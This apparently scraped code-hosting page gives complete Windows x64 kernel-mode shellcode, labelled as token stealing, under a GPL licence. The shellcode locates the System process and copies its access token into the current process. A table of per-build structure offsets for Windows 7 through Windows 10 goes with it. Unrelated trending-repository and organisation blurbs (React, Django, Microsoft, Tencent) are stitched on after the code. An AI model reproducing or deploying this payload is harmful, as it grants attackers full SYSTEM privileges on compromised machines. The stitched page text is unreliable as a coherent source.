Windows x64 handcrafted token stealing kernel-mode shellcode
License: GNU General Public License v3.0
Petite version ...
align 16
steal_system_token:
mov rcx,0xFFFFF780_00000000
lea rdx,[Win_Versions-4]
mov eax,[rcx+0x26C] ; nt!_KUSER_SHARED_DATA.NtMajorVersion
add eax,[rcx+0x270] ; nt!_KUSER_SHARED_DATA.NtMinorVersion
cmp eax,7
jz @F
jc .fail
add rdx,4
cmp eax,10
jc @F
jnz .fail
mov eax,[rcx+0x260] ; nt!_KUSER_SHARED_DATA.NtBuildNumber
.build_scan:
add rdx,8
cmp eax,[rdx]
jnc .build_scan
cmp dword [rdx],-1
jnz @F
.fail:
xor eax,eax
retn
@@:
movzx r9,word [rdx+4]
movzx r10,word [rdx+6]
mov rax,[gs:0x188h] ; nt!KeGetCurrentThread
mov rcx,[rax+0x220] ; nt!IoThreadToProcess
lea rax,[rcx+r9] ; ActiveProcessLinks
; Search for the System process object VA(PID 4)
@@: mov rax,[rax]
cmp qword [rax-8],4
jnz @B
sub rax,r9 ; system process object VA
mov rax,[rax+r10]
and al,0xF0
mov dl,[rcx+r10]
and dl,0x0F
add al,dl
mov [rcx+r10],rax
push 1
pop rax
retn
Win_Versions:
dw 0x0188,0x0208 ; Windows 7/Windows Server 2008 R2
dw 0x02E8,0x0348 ; Windows 8/Windows Server 2012/Windows 8.1/Windows Server 2012 R2
; assume unlisted builds between match known upstream group
; (migrate bounds as more information becomes availible)
Win10_builds:
; 10240
; 10586
; 14393
dd 14393+1
dw 0x02F0,0x0358
; 15063
; 16299
; 17134
; 17763
dd 17763+1
dw 0x02E8,0x0358
; 18362
; 18363
dd 18363+1
dw 0x02F0,0x0360
; 19041
; 19042
; 19043
; 19044
dd 19044+1
dw 0x0448,0x04B8
dd -1 ; terminator
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
Django
The Web framework for perfectionists with deadlines.
Laravel
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft
Open source projects and samples from Microsoft.
Google
Google โค๏ธ Open Source for everyone.
Alibaba
Alibaba Open Source for everyone
D3
Data-Driven Documents codes.
Tencent
China tencent open source team.